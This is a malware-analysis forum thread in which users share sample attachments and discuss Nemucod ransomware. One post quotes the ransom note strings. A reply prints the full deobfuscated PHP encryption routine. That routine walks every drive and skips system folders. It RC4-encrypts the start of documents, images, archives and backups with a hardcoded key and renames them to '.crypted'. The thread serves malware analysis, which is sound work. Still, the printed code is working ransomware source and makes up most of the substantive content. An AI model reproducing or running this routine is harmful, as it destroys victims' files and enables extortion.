Malware collection

Forum for analysis and discussion about malware.
Post Reply
ikolor
Posts: 307
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Malware collection

Post by ikolor » Wed Jul 29, 2015 12:58 pm

https://www.virustotal.com/en/file/a7ef ... /analysis/

There are collection of malware code .Above one scan on these sample.
You do not have the required permissions to view the files attached to this post.

ikolor
Posts: 307
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Sun Aug 02, 2015 3:36 pm

You do not have the required permissions to view the files attached to this post.

ikolor
Posts: 307
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Fri Aug 14, 2015 7:05 pm

You do not have the required permissions to view the files attached to this post.

ikolor
Posts: 307
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Mon Nov 14, 2016 7:48 pm

You do not have the required permissions to view the files attached to this post.

heart888
Posts: 18
Joined: Tue Mar 01, 2016 11:04 pm

Re: Malware collection

Post by heart888 » Sun Nov 20, 2016 11:58 pm

You do not have the required permissions to view the files attached to this post.

ikolor
Posts: 307
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Fri Dec 09, 2016 4:26 pm

You do not have the required permissions to view the files attached to this post.

User avatar
xors
Posts: 159
Joined: Mon May 23, 2016 2:01 am

Re: Malware collection

Post by xors » Fri Dec 09, 2016 5:57 pm

Malware. Not sure which one
You do not have the required permissions to view the files attached to this post.
@xorsthingsv2

User avatar
xors
Posts: 159
Joined: Mon May 23, 2016 2:01 am

Nemucod Ransomware

Post by xors » Mon Dec 12, 2016 9:45 pm

Hello all,

The dropper is a wsf file. The dropper downloads two files, php4ts.dll and a file which will run a php file (a.php). It looks like the php file is doing the encryption. Some strings

Code: Select all

- If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.
- It`s useless to reinstall Windows, update antivirus software, etc.
- Nobody can help you except us.
- You can find this manual on your desktop (DECRYPT.txt).
- Your files can be decrypted only after you make payment.
0.34008019
1. Create Bitcoin wallet here:
2. Buy 0.43335 BTC with cash, using search here:
3. Send 0.43335 BTC to this Bitcoin address:
4. Open one of the following links in your browser to download decryptor:
5. Run decryptor to restore your files.
All your documents, photos, databases and other important personal files
ATTENTION!
PLEASE REMEMBER:
To restore your files you have to pay 0.43335 BTC (bitcoins).
were encrypted using strong RSA-1024 algorithm with a unique key.

You do not have the required permissions to view the files attached to this post.
@xorsthingsv2

Antelox
Posts: 239
Joined: Sun Mar 21, 2010 10:38 pm
Contact:

Re: Nemucod Ransomware

Post by Antelox » Tue Dec 13, 2016 7:32 am

xors wrote:Hello all,

The dropper is a wsf file. The dropper downloads two files, php4ts.dll and a file which will run a php file (a.php). It looks like the php file is doing the encryption. Some strings

Code: Select all

- If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.
- It`s useless to reinstall Windows, update antivirus software, etc.
- Nobody can help you except us.
- You can find this manual on your desktop (DECRYPT.txt).
- Your files can be decrypted only after you make payment.
0.34008019
1. Create Bitcoin wallet here:
2. Buy 0.43335 BTC with cash, using search here:
3. Send 0.43335 BTC to this Bitcoin address:
4. Open one of the following links in your browser to download decryptor:
5. Run decryptor to restore your files.
All your documents, photos, databases and other important personal files
ATTENTION!
PLEASE REMEMBER:
To restore your files you have to pay 0.43335 BTC (bitcoins).
were encrypted using strong RSA-1024 algorithm with a unique key.

It's the last Nemucod ransomware PHP variant, the one which uses the RC4 encryption; The deobfuscated script below:

Code: Select all

<?php set_time_limit(0);
ini_set("display_errors", "Off");
for ($i = 67;$i <= 90;$i++) if (is_dir(chr($i) . ":")) Tree(chr($i) . ":");
function Tree($p) {
    $s = chr(92);
    $k = base64_decode("MGCQXIq4mcz/0AQ48CBQIFCAiMD4gLDgueobOnOs");
    $a = "e";
    if (preg_match("/" . $s . $s . "(winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming|msoffice|temporary|cache)/i", $p) || preg_match("/recycle/i", $p)) return;
    $dp = opendir($p);
    if ($dp === false) return;
    while ($o = readdir($dp)) if ($o != "." && $o != "..") {
        if (is_dir($p . $s . $o)) {
            Tree($p . $s . $o);
        } elseif ($a == "e" && preg_match("/[.](zip|rar|r00|r01|r02|r03|7z|tar|gz|gzip|arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|pptx|pps|sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php|pas|class|py|pl|h|vb|vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv|tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|cad|3ds|blend|lwo|lws|mb|slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf|wmv|veg|mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi|vmdk|vhd|dsk|img|iso)$/i", $o) || $a == "d" && preg_match("/[.](crypted)$/i", $o)) {
            chmod($p . $s . $o, 0777);
            $fp = fopen($p . $s . $o, "r+");
            if ($fp !== false) {
                $b = fread($fp, 2048);
                $z = array();
                for ($i = 0;$i < 256;$i++) $z[$i] = $i;
                $j = 0;
                for ($i = 0;$i < 256;$i++) {
                    $j = ($j + $z[$i] + ord($k[$i % strlen($k) ])) % 256;
                    $x = $z[$i];
                    $z[$i] = $z[$j];
                    $z[$j] = $x;
                }
                $i = 0;
                $j = 0;
                $c = "";
                for ($y = 0;$y < strlen($b);$y++) {
                    $i = ($i + 1) % 256;
                    $j = ($j + $z[$i]) % 256;
                    $x = $z[$i];
                    $z[$i] = $z[$j];
                    $z[$j] = $x;
                    $c.= $b[$y] ^ chr($z[($z[$i] + $z[$j]) % 256]);
                }
                fseek($fp, 0);
                fwrite($fp, $c);
                fclose($fp);
                if ($a == "e") {
                    rename($p . $s . $o, $p . $s . $o . ".crypted");
                } else {
                    rename($p . $s . $o, preg_replace("/[.]crypted$/", "", $p . $s . $o));
                }
            }
        }
    }
    closedir($dp);
}
BR,

Antelox

ikolor
Posts: 307
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Malware collection

Post by ikolor » Wed Dec 21, 2016 7:29 pm

You do not have the required permissions to view the files attached to this post.

Post Reply